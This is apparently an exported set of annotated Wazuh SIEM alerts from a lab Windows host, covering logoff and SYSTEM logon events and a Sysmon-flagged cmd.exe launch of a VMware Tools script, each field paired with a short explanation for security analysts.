data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31C1A7D Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31c1a7d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows User Logoff.

🧠 What happened? Windows User Logoff.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.042+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.042+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows User Logoff.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60137
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2439107
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4634
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12545
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8801986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43986
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was logged off. Subject: Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002 Account Name: Attcker1 Account Domain: Attacker Logon ID: 0x31B4686 Logon Type: 2 This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-21-1227732096-2714569048-1995468811-1002
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x31b4686
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.073+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.073+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2441575
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:18.8808370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43987
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  2444
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:49:46.160+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:46.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534986.2448912
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:19.2315020Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43989
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  17252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. 
- Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:48.407+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:48.407+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534988.2456251
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:01.5883830Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344551
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:49:01.506 ProcessGuid: {94294ddc-bfdd-680a-a90c-000000000e00} ProcessId: 8208 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ParentProcessId: 3372 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:49:01.506
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfdd-680a-a90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8208
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:51.233+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:51.233+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
